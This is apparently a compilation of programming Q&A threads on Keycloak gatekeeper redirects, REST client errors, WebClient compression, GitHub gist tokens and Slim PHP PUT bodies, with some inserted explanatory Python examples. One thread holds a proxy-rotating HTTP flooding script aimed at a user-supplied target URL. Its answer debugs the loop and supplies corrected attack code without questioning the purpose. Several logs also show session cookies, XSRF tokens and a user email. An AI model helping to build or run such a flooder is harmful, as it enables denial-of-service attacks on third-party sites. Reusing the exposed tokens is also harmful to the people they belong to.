keycloak gatekeeper 404 after credentials - keycloak

I have a backend hello-world app, using the following ACLs:

```yaml
match-claims:
  aud: appserver
  iss: http://192.168.1.132/auth/realms/master
resources:
- uri: /app
  methods:
  - GET
  roles:
  - user
  require-any-role: true
```

This causes a 404 right after login, with the following logs:
```
gatekeeper_1 | 1.5576708594647906e+09 error keycloak-gatekeeper/middleware.go:108 no session found in request, redirecting for authorization {"error": "authentication session not found"}
nginx_1 | 172.23.0.1 - - [12/May/2019:22:20:59 +0800] "GET /app HTTP/1.1" 307 95 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
gatekeeper_1 | 1.5576708594775462e+09 debug keycloak-gatekeeper/handlers.go:88 incoming authorization request from client address {"access_type": "", "auth_url": "http://192.168.1.132/auth/realms/master/protocol/openid-connect/auth?client_id=appserver&redirect_uri=http%3A%2F%2Flocalhost%2Foauth%2Fcallback&response_type=code&scope=openid+email+profile&state=9e9edff9-b532-45e8-8b57-ed30783b38d6", "client_ip": "172.23.0.6:42310"}
nginx_1 | 172.23.0.1 - - [12/May/2019:22:20:59 +0800] "GET /oauth/authorize?state=9e9edff9-b532-45e8-8b57-ed30783b38d6 HTTP/1.1" 307 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
nginx_1 | 172.23.0.1 - - [12/May/2019:22:20:59 +0800] "GET /auth/realms/master/protocol/openid-connect/auth?client_id=appserver&redirect_uri=http%3A%2F%2Flocalhost%2Foauth%2Fcallback&response_type=code&scope=openid+email+profile&state=9e9edff9-b532-45e8-8b57-ed30783b38d6 HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
nginx_1 | 172.23.0.1 - appserver [12/May/2019:22:20:59 +0800] "POST /auth/realms/master/protocol/openid-connect/token HTTP/1.1" 200 3507 "-" "Go-http-client/1.1"
gatekeeper_1 | 1.557670859584654e+09 info keycloak-gatekeeper/handlers.go:167 issuing access token for user {"email": "benjamin.hon#biomind.ai", "expires": "2019-05-12T14:21:59Z", "duration": "59.4153639s"}
nginx_1 | 172.23.0.1 - - [12/May/2019:22:20:59 +0800] "GET /oauth/callback?state=9e9edff9-b532-45e8-8b57-ed30783b38d6&session_state=bea8afff-1137-4a60-beb5-cf05a9974b34&code=ce737cdb-f3b2-4c8f-9198-5f5e0d80e2f4.bea8afff-1137-4a60-beb5-cf05a9974b34.10d7e9eb-226b-4ac8-890e-6c640ab53059 HTTP/1.1" 307 37 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
nginx_1 | 172.23.0.1 - - [12/May/2019:22:20:59 +0800] "GET / HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
nginx_1 | 172.23.0.1 - - [12/May/2019:22:20:59 +0800] "GET /auth/realms/master/protocol/openid-connect/auth?client_id=appserver&redirect_uri=http%3A%2F%2Flocalhost%2Foauth%2Fcallback&response_type=code&scope=openid+email+profile&state=9e9edff9-b532-45e8-8b57-ed30783b38d6 HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
nginx_1 | 172.23.0.1 - appserver [12/May/2019:22:20:59 +0800] "POST /auth/realms/master/protocol/openid-connect/token HTTP/1.1" 200 3507 "-" "Go-http-client/1.1"
gatekeeper_1 | 1.5576708598920956e+09 info keycloak-gatekeeper/handlers.go:167 issuing access token for user {"email": "benjamin.hon#biomind.ai", "expires": "2019-05-12T14:21:59Z", "duration": "59.107928s"}
nginx_1 | 172.23.0.1 - - [12/May/2019:22:20:59 +0800] "GET /oauth/callback?state=9e9edff9-b532-45e8-8b57-ed30783b38d6&session_state=bea8afff-1137-4a60-beb5-cf05a9974b34&code=fc79909a-3b36-4140-ac6a-cc340b621398.bea8afff-1137-4a60-beb5-cf05a9974b34.10d7e9eb-226b-4ac8-890e-6c640ab53059 HTTP/1.1" 307 37 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
```
However, it works if I use the following ACLs:

```yaml
resources:
- uri: /app
  methods:
  - GET
  white-listed: true
```
I've checked everything; the roles are created and assigned.

This is the JWT I get after logging in:

```json
{
  "jti": "04de181a-bf9a-4db3-bfcc-006a12d00892",
  "exp": 1557672962,
  "nbf": 0,
  "iat": 1557672902,
  "iss": "http://192.168.1.132/auth/realms/master",
  "aud": [
    "account",
    "appserver"
  ],
  "sub": "d7a580b3-7987-40fa-905d-5be1662392ee",
  "typ": "Bearer",
  "azp": "appserver",
  "auth_time": 1557672902,
  "session_state": "71353c04-3e7c-4cf4-9203-fea485990fe9",
  "acr": "1",
  "realm_access": {
    "roles": [
      "offline_access",
      "uma_authorization",
      "user"
    ]
  },
  "resource_access": {
    "account": {
      "roles": [
        "manage-account",
        "manage-account-links",
        "view-profile"
      ]
    }
  },
  "scope": "openid profile email",
  "email_verified": true,
  "name": "john doe",
  "preferred_username": "john",
  "given_name": "john",
  "family_name": "doe",
  "email": "xxx"
}
```
It seems to me that the authentication is working, but after the authorization, it seems to not redirect it to the internal proxy of the backend app, but to http://localhost instead?
I don't really know how to debug this though, any help will be appreciated!

Ahh, I got it to work. There were two things that needed to be set:

```yaml
secure-cookie: false
redirect-url: <gatekeeper url>
```
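To make the role check concrete, here is an added Python example (not gatekeeper's code, and not from the question or the answer) that evaluates both ACLs above against the decoded token from the question. It assumes gatekeeper's conventions as I understand them: `match-claims` values are full-match regular expressions, `aud` may be a string or a list, realm roles are matched by bare name and client roles as `client:role`, and a request matching no listed resource is denied (a conservative choice for this example). All sample data is constructed from the question.

```python
import re
from fnmatch import fnmatchcase

# Constructed sample: the first ACL from the question, as a YAML loader would hand it over
ACL_ROLES = {
    "match-claims": {
        "aud": "appserver",
        "iss": "http://192.168.1.132/auth/realms/master",
    },
    "resources": [
        {"uri": "/app", "methods": ["GET"], "roles": ["user"], "require-any-role": True},
    ],
}

# Constructed sample: the second ACL from the question (the one that "works")
ACL_WHITELIST = {
    "resources": [
        {"uri": "/app", "methods": ["GET"], "white-listed": True},
    ],
}

# Constructed sample: the claims that matter, taken from the decoded token in the question
CLAIMS = {
    "iss": "http://192.168.1.132/auth/realms/master",
    "aud": ["account", "appserver"],
    "azp": "appserver",
    "realm_access": {"roles": ["offline_access", "uma_authorization", "user"]},
    "resource_access": {"account": {"roles": ["manage-account", "view-profile"]}},
}


def token_roles(claims):
    """Flatten realm roles as bare names and client roles as client:role (assumed convention)."""
    roles = set(claims.get("realm_access", {}).get("roles", []))
    for client, access in claims.get("resource_access", {}).items():
        roles.update(f"{client}:{r}" for r in access.get("roles", []))
    return roles


def claims_match(claims, match):
    """Every match-claims entry must be satisfied; values are full-match regexes (assumption).
    aud may be a single string or a list (RFC 7519), so both shapes are handled."""
    for name, pattern in match.items():
        values = claims.get(name)
        if values is None:
            return False, f"claim {name!r} missing"
        if not isinstance(values, list):
            values = [values]
        if not any(re.fullmatch(pattern, str(v)) for v in values):
            return False, f"claim {name!r}={values!r} does not match {pattern!r}"
    return True, "claims ok"


def find_resource(method, path, acl):
    """First resource whose uri glob and method list cover the request, else None."""
    for res in acl.get("resources", []):
        if not fnmatchcase(path, res["uri"]):
            continue
        methods = {m.upper() for m in res.get("methods", [])}
        if methods and method.upper() not in methods:
            continue
        return res
    return None


def authorize(method, path, claims, acl):
    """Return (allowed, reason) for one request against one ACL."""
    res = find_resource(method, path, acl)
    if res is None:
        return False, f"no resource matches {method} {path}"
    if res.get("white-listed"):
        return True, f"{res['uri']} is white-listed: the token is not checked at all"
    ok, why = claims_match(claims, acl.get("match-claims", {}))
    if not ok:
        return False, why
    required = set(res.get("roles", []))
    if not required:
        return True, "authenticated; no roles required"
    held = token_roles(claims)
    if res.get("require-any-role"):
        hit = required & held
        return bool(hit), f"need any of {sorted(required)}, token holds {sorted(hit)}"
    missing = required - held
    return not missing, f"need all of {sorted(required)}, missing {sorted(missing)}"


if __name__ == "__main__":
    for label, acl in (("roles ACL", ACL_ROLES), ("white-listed ACL", ACL_WHITELIST)):
        for method, path in (("GET", "/app"), ("POST", "/app"), ("GET", "/")):
            print(label, method, path, authorize(method, path, CLAIMS, acl))
```

Run against the token in the question, `GET /app` passes the roles ACL, so the authorization rule itself is not what produces the 404; the log shows the 404 on `GET /` after the callback, which is the redirect target the answer's `redirect-url` setting fixes. The white-listed variant "works" only because it skips the token check for that resource entirely, so it is a diagnostic, not a fix. `secure-cookie: false` matches the plain-HTTP lab setup in the log (`http://192.168.1.132`); behind HTTPS it should stay on.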

Related

Same request - get error: 400 Bad Request - Advance REST Client

I execute an HTTP POST request with Postman (desktop version):

```
POST http://127.0.0.1:8090/api/profiles/export
Host: 127.0.0.1:8090
Connection: keep-alive
Content-Length: 282
Accept: application/json, text/plain, */*
X-XSRF-TOKEN: CfDJ8CQGvOgKAdr991T0W48TbmbJulHjCLSNl5Ufw9B-aa4W8FnpeleEvRxItMC3lj0KiyXTrhn9vOR3RCtTxSIpCh1d3JfjRIT2GRk3osT3e_7g
Authorization: gUqILBH5fUu+ZIU98Xq62g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Content-Type: application/json
Origin: http://127.0.0.1:8090
Referer: http://127.0.0.1:8090/folders/cpes/1189/profiles
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9,ru-RU;q=0.8,ru;q=0.7,en-US;q=0.6
Cookie: .AspNetCore.Antiforgery.vAmb-7is-9Q=CfDJ-N_Krwb3YlxI4utC_l6qsoVQQc8YY6DeFOfaTVHkx8bFMqDtjDRN0N1O3MmbfbRYSq72tic5B-MPpiybWUtaEbtaXIvHiBbRpOsYG5vj66tkYlrY-j6CA; XSRF-TOKEN=CfDJ8CQGvOgpT-VClVphMqoot5levDSTI5VFGbACv6z7_pXhiCrcdtKAdr991T0W48TbmbJulHjCLSNl5Ufw9B-aa4W8FnpeleEvRxItMC3lj0KiyXTrhn9vOR3RCtTxSIpCh1d3JfjRIT2GRk3osT3e_7g
```

Payload:

```json
{"Interval":0,"Request":{"folderId":1189,"filter":"{}","visibleColumns":["profileType","name","description","managedGroups","parentFolder.name"],"visibleColumnsNames":["Profile Type","Name","Description","Assigned To (Managed Groups)","Parent"],"orders":"profileType:asc,name:asc"}}
```

I get a success response:

```json
{
  "code": 200,
  "result": {
    "ftpAddress": "ftp://127.0.0.1/export/",
    "fileName": "admin_Profiles_20220728160913.csv"
  }
}
```
Nice. I can execute this request with Postman many times and get a success response. OK.

Now I want to execute the SAME POST request with Advanced REST Client (Chrome extension). But I get an error:

```html
<html>
<head><title>400 Bad Request</title></head>
<body>
<center><h1>400 Bad Request</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>
```

Why I cannot access Yobit API using webclient

The code used to work. The URL in question is https://yobit.net/api/3/info

It works in IE. It used to work with WebClient. It doesn't work with WebClient now, and I wonder what the problem is. It suddenly stopped working, so I am checking:

```vb
Try
    Dim wc = New WebClient
    wc.Headers.Add("Accept", "text/html, application/xhtml+xml, image/jxr, */*")
    wc.Headers.Add("Accept-Encoding", "gzip, deflate")
    wc.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko")
    wc.Headers.Add("Accept-Language", "en-US,en;q=0.5")
    wc.DownloadString(URL)
Catch ex As Exception
End Try
```

I also tried the simple version. Not working:

```vb
Try
    Dim wc = New WebClient
    wc.DownloadString(URL)
Catch ex As Exception
End Try
```

In both cases Yobit throws a 503 access denied exception.

I use Fiddler and try Internet Explorer to access it directly. It works fine:

```
GET https://yobit.net/api/3/info HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: yobit.net
Connection: Keep-Alive
Cookie: __cfduid=de63c60d603f271520b9ee58dfdd257061517932785; cf_clearance=7e58588df28b267842f753567dcdc475d29679a6-1517932789-86400; locale=en
```

If I use WebClient, this is the header:

```
GET https://yobit.net/api/3/info HTTP/1.1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Accept: text/html, application/xhtml+xml, image/jxr, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: yobit.net
Connection: Keep-Alive
```

Almost the exact same thing.

Let me try another URL, say http://google.com:

```
GET http://www.google.com/ HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.google.com
Connection: Keep-Alive
Cookie: NID=121=GUd4VKHT_gcwUx-hK39mphuCg93Q_W2fL_yCc-JO3AJkgh74EGajif0537eraLK8ns2EdEQPexOOeBxSlOxVrj8t_AVn21FRme2hAxuLXz4F8aCZExIzME4jaYMBuUp_lnak5Q; OGPC=19004116-3:; 1P_JAR=2018-1-9-7
```

If I use WebClient:

```
GET http://google.com/ HTTP/1.1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Accept: text/html, application/xhtml+xml, image/jxr, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: google.com
Connection: Keep-Alive
```

Both work.
There could be different issues here.

Framework Version

You recently changed the framework version, and that has some issue which causes it not to work. You can change the framework versions and see if it helps.

Compression of Data

WebClient by default does not do decompression, and you add headers to request gzip data if available. Now there is a possibility that the site didn't enable gzip earlier, which made it work for you, and now they have enabled gzip responses. You can fix that by changing

```vb
wc.Headers.Add("Accept-Encoding", "gzip, deflate")
```

to

```vb
wc.Headers.Add("Accept-Encoding", "deflate")
```

Or, if you want the data to come in compressed form only, then you can enable auto decompression as shown in the code below:

```csharp
using System;
using System.Net;

class Program
{
    // WebClient subclass that turns on automatic gzip/deflate decompression
    class MyWebClient : WebClient
    {
        protected override WebRequest GetWebRequest(Uri address)
        {
            var request = base.GetWebRequest(address);
            var http = request as HttpWebRequest;
            if (http != null)
            {
                http.AutomaticDecompression = DecompressionMethods.Deflate | DecompressionMethods.GZip;
            }
            return request;
        }
    }

    public static void Main(string[] args)
    {
        var URL = "https://yobit.net/api/3/info";
        var wc = new MyWebClient();   // must be the subclass, otherwise the override never runs
        wc.Headers.Add("Accept", "text/html, application/xhtml+xml, image/jxr, */*");
        wc.Headers.Add("Accept-Encoding", "gzip, deflate");
        wc.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko");
        wc.Headers.Add("Accept-Language", "en-US,en;q=0.5");
        Console.WriteLine(wc.DownloadString(URL));
        Console.Write("Press any key to continue . . . ");
        Console.ReadKey(true);
    }
}
```

The above example is C# and not VB.NET, but you can easily convert it.
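As an added example (not from the answer, and in Python rather than C#/VB.NET), here is the decoding step that the answer's `AutomaticDecompression` setting performs, applied to constructed responses: a client that advertises `Accept-Encoding: gzip, deflate` but never decodes the body is left with bytes that will not parse as text, which is the failure mode to rule out first. The raw-DEFLATE fallback covers servers that send raw DEFLATE under the `deflate` label. The sample JSON below is constructed, not the real API output; the two captures on the page also differ in the `Cookie` header, which is worth checking separately.

```python
import gzip
import json
import zlib

# Constructed sample: a small JSON document standing in for the API response on the page
SAMPLE = {"server_time": 1517932785, "pairs": {"btc_usd": {"decimal_places": 3}}}


def make_response(encoding):
    """Build (headers, body) the way a server honouring Accept-Encoding would (constructed)."""
    raw = json.dumps(SAMPLE).encode("utf-8")
    if encoding == "gzip":
        return {"Content-Encoding": "gzip"}, gzip.compress(raw)
    if encoding == "deflate":
        return {"Content-Encoding": "deflate"}, zlib.compress(raw)
    if encoding == "raw-deflate":
        # some servers send raw DEFLATE (no zlib header) but still label it "deflate"
        comp = zlib.compressobj(wbits=-zlib.MAX_WBITS)
        return {"Content-Encoding": "deflate"}, comp.compress(raw) + comp.flush()
    return {}, raw


def decode_body(headers, body):
    """Undo the Content-Encoding a server applied; header names match case-insensitively."""
    encoding = next((v for k, v in headers.items() if k.lower() == "content-encoding"), "")
    encoding = encoding.strip().lower()
    if encoding in ("", "identity"):
        return body
    if encoding == "gzip":
        return gzip.decompress(body)
    if encoding == "deflate":
        try:
            return zlib.decompress(body)                   # zlib-wrapped, as RFC 7230 defines it
        except zlib.error:
            return zlib.decompress(body, -zlib.MAX_WBITS)  # raw DEFLATE fallback
    raise ValueError(f"unsupported Content-Encoding {encoding!r}")


def parse_json_response(headers, body):
    """What a client should do: decode by Content-Encoding, then parse."""
    return json.loads(decode_body(headers, body).decode("utf-8"))


def parses_without_decoding(body):
    """What the client in the question does: treat the body as text as-is."""
    try:
        json.loads(body.decode("utf-8"))
        return True
    except (UnicodeDecodeError, ValueError):
        return False


if __name__ == "__main__":
    for enc in ("identity", "gzip", "deflate", "raw-deflate"):
        headers, body = make_response(enc)
        print(enc, "raw parse ok:", parses_without_decoding(body),
              "decoded parse ok:", parse_json_response(headers, body) == SAMPLE)
```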

Personal Access token in Gist

I've created a personal access token (https://github.com/settings/tokens) giving Gist perms.
I'm trying to use it to create a gist, but I'm getting:

```json
{
  "message": "Not Found",
  "documentation_url": "https://developer.github.com/v3"
}
```

My request is:

```
POST /gist HTTP/1.1
Host: api.github.com
Connection: close
X-Client-Data: CJO2yQEIorbJAQjBtskBCPqcygEIqZ3KAQjSncoBCKijygE=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Accept-Language: en-US,en;q=0.8,es;q=0.6
Authorization: Basic blablablablablabla
Content-Length: 142

{
  "description": "the description for this gist",
  "files": {
    "file1.txt": {
      "content": "String file contents"
    }
  }
}
```

Can't personal tokens be used to post a gist?
The problem is that Basic authentication should not be used; instead, a specific header provides the token. The request should be:

```
POST /gist HTTP/1.1
Host: api.github.com
Connection: close
X-Client-Data: CJO2yQEIorbJAQjBtskBCPqcygEIqZ3KAQjSncoBCKijygE=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Accept-Language: en-US,en;q=0.8,es;q=0.6
Authorization: token aabbaabbaabbabababababababababababababab
Content-Length: 142

{
  "description": "the description for this gist",
  "files": {
    "file1.txt": {
      "content": "String file contents"
    }
  }
}
```

Problems building a flooding script that uses sockets

I'm trying to improve two flooder projects (not mine) by making my own script out of those two. Doing that, I've almost finished, but I'm stuck at a point where the script does nothing.

Here is the code:

```python
import socket, threading, random, time, urllib.request, re, os.path
from bs4 import BeautifulSoup

useragents=["Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A",
"Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko",
"Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1",
"Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
"Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
"Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1",]

def checkurl():
    global url
    url = input("Insert URL: ")
    if url[0]+url[1]+url[2]+url[3] == "www.":
        url = "http://" + url
    elif url[0]+url[1]+url[2]+url[3] == "http":
        pass
    else:
        url = "http://" + url

def threads():
    global thread
    try:
        thread = int(input("Thread (800): "))
    except:
        thread = 800

def proxymode():
    global choise1
    choise1 = input("Do you want proxy mode? Answer 'y' to enable it: ")
    if choise1 == "y":
        choisedownproxy()
    else:
        exit(0)

def choisedownproxy():
    choise2 = input("Do you want to download a fresh list of proxy? Answer 'y' to do it: ")
    print ("")
    if choise2 == "y":
        proxyget()
    else:
        proxylist()

def proxyget():
    if os.path.isfile("proxy.txt"):
        out_file = open("proxy.txt","w")
        out_file.write("")
        out_file.close()
    else:
        pass
    url = "https://www.inforge.net/xi/forums/liste-proxy.1118/"
    soup = BeautifulSoup(urllib.request.urlopen(url), "lxml")
    base = "https://www.inforge.net/xi/"
    for tag in soup.find_all("a", {"class":"PreviewTooltip"}):
        links = tag.get("href")
        final = base + links
        result = urllib.request.urlopen(final)
        for line in result :
            ip = re.findall("(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3}):(?:[\d]{1,5})", str(line))
            if ip:
                print("Proxy grabbed=> "+'\n'.join(ip))
                for x in ip:
                    out_file = open("proxy.txt","a")
                    while True:
                        out_file.write(x+"\n")
                        out_file.close()
                        break
    proxylist()

def proxylist():
    global proxy
    global entries
    out_file = str(input("Enter the proxy list: "))
    entries = open(out_file).readlines()
    proxy = random.choice(entries).strip().split(':')
    requestproxy()

def requestproxy():
    global proxy
    host = proxy[0]
    port = proxy[1]
    host_url = url.replace("http://", "").replace("https://", "").split('/')[0]
    get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n"
    useragent = "User-Agent: " + random.choice(useragents) + "\r\n"
    accept = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate"
    connection = "Connection: Keep-Alive\r\n"
    request = get_host + useragent + accept + connection + "\r\n"
    while True:
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((host, port))
            s.send(request)
        except:
            proxy = random.choice(entries).strip().split(':')

checkurl()
threads()
proxymode()
```
As you can see, this script uses a list of proxies to send requests (using the socket library) to the target. But when I arrive at "Enter the proxy list" and after typing "proxy.txt", the script gets stuck! What did I do wrong? Can you help me?
After you enter "proxy.txt", the script opens the file and then calls requestproxy(). At the end of your requestproxy() you have a "while True". This is an infinite loop, so it will get stuck there unless there is a "break" somewhere, which isn't the case. You should probably add a break after s.send(request) and put the entire function into a loop. That way your infinite loop stops if the package has been sent, but if there was an exception it will try again with a different proxy.

That would look like this:

```python
def requestproxy():
    while True:
        global proxy
        host = proxy[0]
        port = proxy[1]
        host_url = url.replace("http://", "").replace("https://", "").split('/')[0]
        get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n"
        useragent = "User-Agent: " + random.choice(useragents) + "\r\n"
        accept = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate"
        connection = "Connection: Keep-Alive\r\n"
        request = get_host + useragent + accept + connection + "\r\n"
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((host, port))
            s.send(request)
            break
        except:
            proxy = random.choice(entries).strip().split(':')
```

I hope this helps. Have a nice day!

angularjs restangular customPUT with Slim php restful framework

I am trying to update a database using Slim PHP, but the form data values passed in are showing up blank. I have been successful in posting (customPOST) the values.

Here is the code.

AngularJS:

```javascript
UpdateCategoryFormData: function (category, catId) {
    var formData = new FormData();
    angular.forEach(category, function (fieldData, field) {
        formData.append(field, fieldData);
    });
    return Restangular.one('category/update', catId)
        .withHttpConfig({transformRequest: angular.identity})
        .customPUT(formData, undefined, {}, {'Content-Type': undefined});
}
```

Slim PHP:

```php
$app->put('/category/update/:catId', function ($catId) use ($app) {
    $data = $app->request->put();
    print_r($data);
    $catName = $app->request->put('catName');
    $catParent = $app->request->put('catParent');
    echo $catName;
});
```

The result of print_r($data) is:

```
array()
```

and with echo $catName; I am getting a blank as the value of $catName.

Here is a copy of the headers:

```
Request Method: PUT
Status Code: 200 OK

Response Headers
Connection: Keep-Alive
Content-Length: 10
Content-Type: text/html
Date: Fri, 28 Aug 2015 03:48:28 GMT
Keep-Alive: timeout=5, max=100
Server: Apache/2.4.9 (Win32) PHP/5.5.12
X-Powered-By: PHP/5.5.12

Request Headers
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Connection: keep-alive
Content-Length: 249
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4gUX2gCt7zCICZNN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2489.0 Safari/537.36

Request Payload
------WebKitFormBoundary4gUX2gCt7zCICZNN
Content-Disposition: form-data; name="catName"

Some Category
------WebKitFormBoundary4gUX2gCt7zCICZNN
Content-Disposition: form-data; name="catParent"

45
------WebKitFormBoundary4gUX2gCt7zCICZNN--
```

Can someone help, please!
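The page carries no answer, so as an added example (not from the question, and in Python rather than PHP so it runs stand-alone) here is a strict parser for the multipart/form-data payload shown in the headers above. PHP itself only populates the form-field arrays for POST requests; a PUT body arrives raw, which is consistent with the empty `array()` on the page, so whatever handles a multipart PUT has to do this framing work itself. The payload below is reconstructed from the question with its CRLF line endings restored; the boundary is the one in the captured Content-Type header. The parser rejects a missing closing delimiter and malformed part framing rather than guessing, and caps the number of fields.

```python
import re

# Constructed sample: the request payload from the question, with the CRLF framing restored
BOUNDARY = "----WebKitFormBoundary4gUX2gCt7zCICZNN"
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY
BODY = b"".join([
    b"--" + BOUNDARY.encode() + b"\r\n",
    b'Content-Disposition: form-data; name="catName"\r\n\r\nSome Category\r\n',
    b"--" + BOUNDARY.encode() + b"\r\n",
    b'Content-Disposition: form-data; name="catParent"\r\n\r\n45\r\n',
    b"--" + BOUNDARY.encode() + b"--\r\n",
])


def boundary_from_content_type(content_type):
    """Extract the boundary parameter, quoted or bare, from a Content-Type header value."""
    m = re.search(r'boundary=(?:"([^"]+)"|([^;]+))', content_type)
    if not m:
        raise ValueError("no boundary parameter in Content-Type")
    return (m.group(1) or m.group(2)).strip()


def parse_multipart(content_type, body, max_fields=100):
    """Return {field_name: value} for the form fields of a multipart/form-data body (RFC 7578)."""
    delimiter = b"--" + boundary_from_content_type(content_type).encode("latin-1")
    chunks = body.split(delimiter)
    # chunks[0] is the preamble; the last chunk must begin with "--" (the closing delimiter)
    if len(chunks) < 2 or not chunks[-1].startswith(b"--"):
        raise ValueError("missing closing boundary")
    fields = {}
    for part in chunks[1:-1]:
        # each part is framed as CRLF, headers, CRLF CRLF, value, CRLF
        if not (part.startswith(b"\r\n") and part.endswith(b"\r\n")):
            raise ValueError("malformed part framing")
        head, sep, value = part[2:-2].partition(b"\r\n\r\n")
        if not sep:
            raise ValueError("part without header/value separator")
        headers = {}
        for line in head.split(b"\r\n"):
            name, _, val = line.partition(b":")
            headers[name.strip().lower().decode("latin-1")] = val.strip().decode("latin-1")
        disposition = headers.get("content-disposition", "")
        m = re.search(r'name="([^"]*)"', disposition)
        if not m:
            raise ValueError("part without a field name")
        if "filename=" in disposition:
            continue  # file parts are not form fields; this example only collects fields
        if len(fields) >= max_fields:
            raise ValueError("too many fields")
        fields[m.group(1)] = value.decode("utf-8")
    return fields


def is_well_formed(content_type, body):
    """True when the body parses under the strict rules above, False on any framing error."""
    try:
        parse_multipart(content_type, body)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(parse_multipart(CONTENT_TYPE, BODY))   # {'catName': 'Some Category', 'catParent': '45'}
```

The split-on-delimiter approach is safe here because RFC 7578 forbids the boundary from appearing inside any part; the framing checks are what turn a truncated or tampered body into an error instead of a silently empty field set, which is exactly the symptom in the question.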